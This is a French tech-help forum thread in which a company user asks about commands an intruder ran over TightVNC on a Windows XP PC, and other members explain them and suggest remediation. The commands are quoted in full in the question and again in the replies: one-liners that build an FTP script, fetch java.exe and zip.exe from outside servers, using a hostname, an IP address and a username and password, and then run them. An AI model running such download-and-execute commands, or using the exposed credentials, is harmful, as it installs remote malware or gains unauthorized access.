Explication commande DOS

Joki · Juin 6, 2011, 8:09

Bien le bonjour,

Je rencontre actuellement un problème informatique au sein de mon entreprise. Une personne (malveillante ou non, à vous de me le dire ) s’est connecté à distance sur l’un de nos PC et à effectuer des commandes DOS.

Pour résumé les faits :

Déjà tous nos PC sont équipés du logiciel TightVNC afin de réaliser la maintenance informatique (réalisé par un prestataire, nous n’avons pas de service informatique).
Une personne s’est connecté à distance via TightVNC sur l’un de nos PC (sous windows XP) et a réalisé les opérations suivantes :

Désactivation du pare feu Zone Alarm
Désactivation de l’anti-virus
Cliquer sur démarrer -> Executer -> cmd
Entrer les commandes suivantes :

cmd /c echo open ftp.insaatedu.com 21 >> ik &echo user insaated zKBv0OOpFXxW >> ik &echo binary >> ik &echo get java.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &java.exe &exit

cmd /c echo open 90.80.5.68 >> ik &echo user ftp ftp@ftp.net >> ik &echo binary >> ik &echo get zip.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &zip.exe &exit

Ma première réaction était de penser que s’était notre prestataire informatique qui réalisé une maintenance, ce qui n’est pas le cas après avoir eu confirmation.

Je voudrais donc savoir ce qu’avait l’intention de faire cette personne via ses commandes, étant clairement du chinois pour moi :lol:

Merci d’avance.
Edité le 06/06/2011 à 08:10

Sans-Nom · Juin 6, 2011, 10:29

Pas compliqué, la première a l’air de se connecter à un serveur FTP (ftp.insaatedu.com) pour recupérer java.exe, et la seconde pareil avec zip.exe.

open ftp.insaatedu.com 21
user insaated zKBv0OOpFXxW
binary
get java.exe
bye

open 90.80.5.68
user ftp ftp@ftp.net
binary
get zip.exe
bye

Par contre, je dirais surtout que zip.exe & java.exe sont d’autres exécutables que ce qu’ils prétendent être, et qu’en conséquence, il a du faire d’autres manip. S’il n’a fait ça que sur un PC, je l’isolerais du réseau (vire le câble réseau) afin qu’il n’infecte rien d’autre.

eberlue · Juin 6, 2011, 10:29

D’après ce que j’ai compris (ca vaut ce que ça vaut vu que je ne suis pas un expert en commande DOS), la personne qui s’est “introduite” a téléchargé plusieurs logiciels (java.exe et zip.exe) sur l’ordinateur via un serveur FTP.

Pour remédier à ton problème, supprimes ces deux fichiers, réactives ton antivirus et le pare-feu et changes le mot de passe de TightVNC

Si l’utilisateur “normal” de l’ordinateur doit se connecter avec un compte sur l’ordinateur, modifies ses droits de manière à ne pas avoir accès à l’invite de commande (cmd), aux modifications des services et au clic droit sur la barre des tâches.

Cela ne résoudra peut être pas ton problème, mais empêchera d’autres ennuis du même genre

Feunoir · Juin 6, 2011, 10:36

cmd /c echo open ftp.insaatedu.com 21 >> ik
&echo user insaated zKBv0OOpFXxW >> ik
&echo binary >> ik
&echo get java.exe >> ik
&echo bye >> ik

&ftp -n -v -s:ik
&del ik
&java.exe
&exit

ce qui met dans un fichier nommé ik :

open ftp.insaatedu.com 21
user insaated zKBv0OOpFXxW
binary
get java.exe
bye

puis cela lance la commande :
ftp -n -v -s:ik
ftp sous dos

en gros avec ik : recupere un fichier java.exe sur un ftp avec un nom de user et mot de pass puis ferme la commande ftp avec bye

puis efface le fichier ik
puis lance java.exe
puis ferme cmd

la deuxieme fait pareil avec un fichier zip.exe

je connaissais même pas cette commande ftp

snif, en retard le temps de taper tout cela
Edité le 06/06/2011 à 10:38

Joki · Juin 6, 2011, 10:44

Merci pour vos réponses :super:

Jiheme44 · Juin 6, 2011, 11:45

donc, on peut se connecter sur son ftp s’il n’a pas changé le mot de passe? :fou: :paf: